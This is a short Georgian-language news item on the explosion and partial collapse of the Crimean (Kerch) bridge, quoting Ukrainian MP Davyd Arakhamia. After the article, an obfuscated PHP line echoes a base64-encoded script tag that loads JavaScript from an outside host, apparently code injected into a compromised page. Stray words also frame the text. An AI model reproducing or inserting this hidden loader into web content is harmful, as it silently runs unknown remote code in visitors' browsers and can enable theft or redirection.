celsiusi
ავერსი შნაიდერი
რუსული უკანონო მშენებლობები იწყებს ნგრევას და ცეცხლში გახვევას. მიზეზი მარტივია: თუკი რაღაცას ფეთქებადსაშიშს აშენებ, ადრე თუ გვიან, ის აფეთქდება, - ამის შესახებ უკრაინის რადას ფრაქცია „ხალხის მსახურის“ თავმჯდომარე, დავით არახამია „ტელეგრამში“ წერს, რითაც ის ყირიმის ხიდზე დღეს დილით მომხდარ აფეთქებას ეხმაურება.
 
„ეს მხოლოდ დასაწყისია. საიმედო მშენებლობა არ არის ის, რითაც რუსეთი განსაკუთრებით ცნობილია“, - აცხადებს არახამია.
 
შეგახსენებთ, დღეს დილით ყირიმის ხიდზე სატვირთო ავტომობილი აფეთქდა, რის შედეგადაც საწვავის ავზები აალდა და ხიდზე ძლიერი ხანძარი გაჩნდა. ხიდის ნაწილი ჩამოიშალა და წყალში ჩავარდა.
 
ყირიმის, ანუ ქერჩის ხიდი ორი პარალელური ნაწილისგან, საავტომობილო და სარკინიგზო ნაწილისგან შედგება და ის რუსეთს ოკუპირებულ ყირიმთან აკავშირებს. ყირიმის ხიდი ვლადიმერ პუტინის დავალებით აშენდა და 2018 წელს გაიხსნა. ამ ხიდს რუსეთი უკრაინის სამხრეთში მყოფი საჯარისო ნაწილების მომარაგებისთვის იყენებს. 
494
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");